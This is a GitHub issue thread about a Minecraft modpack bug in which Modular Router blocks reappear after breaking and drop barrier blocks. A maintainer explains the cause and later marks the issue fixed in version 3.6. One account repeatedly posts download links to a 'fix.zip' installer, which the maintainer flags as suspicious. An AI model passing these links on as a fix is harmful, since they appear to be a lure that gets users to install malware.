### ISSUE TITLE
Modular Router breaking issue, drops barrier in some cases

### ISSUE THREAD

**Issue by cdvhs** [ChosenArchitect/Project-Architect-2#179]
**Describe the bug**
->Whenever I place down a modular router even with no modules or anything it makes the block unbreakable like it breaks but immediately appears again. Something extra however that just happened recently is that I didnt have to actually go into creative mode, all I did was activate cheats through the LAN feature and when I broke the blocks they also gave me barrier blocks which never happened before.

**To Reproduce**
1. place down modular router

**Expected behavior**
-> try to break it and it just reappears instantly

**Screenshots**
If applicable, add screenshots to help explain your problem. (Use F2 to take a screenshot in-game)

https://github.com/user-attachments/assets/1e9ae494-39d0-435b-995e-d04e787e76c8

**Modpack version**
->3.5 project architect 2
**Java Version**
->1.20.1
**Modpack Launcher Used**
->i used the skip launcher feature in curse forge
**Ram Allocated**
->around 20000MB

**Additional context**
->

**Comment by IRicTheCoder** [comment]
This has been addressed a couple of times, it is a bug with one of the fixes implemented to fix another issue with the Routers. Cheats do allow you to break it, the barrier was from another bug, with handling multiple breaks. It has been fixed, and should be deployed in new versions, the barriers are from the items you have inside the routers. Its a placeholder when creating the drops.

Sorry for the inconvenience, avoid destroying multiple ones in a single go, or at least having a magnet on when destroying them.

**Comment by cdvhs** [comment]
ah sorry I didnt realize it was already addressed before. Thank you for the help though.

**Comment by IRicTheCoder** [comment]
> ah sorry I didnt realize it was already addressed before. Thank you for the help though.

All good, the barrier issue was addressed on Discord so having it here actually helps, so thank you for submitting it.

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by IRicTheCoder** [comment]
> Download https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file In the installer menu, select "gcc."

Not sure why you are providing a fix, that requires an installer, that on its own is kinda suspicious, care to elaborate? Since it has been said it has been fixed, and a fix will be provided on the next update?

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=0
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IRicTheCoder** [comment]
This has been fixed in version 3.6, however do not leave items with NBTs inside the Buffer as they can break when the modular router is broken. Closing this as fixed.
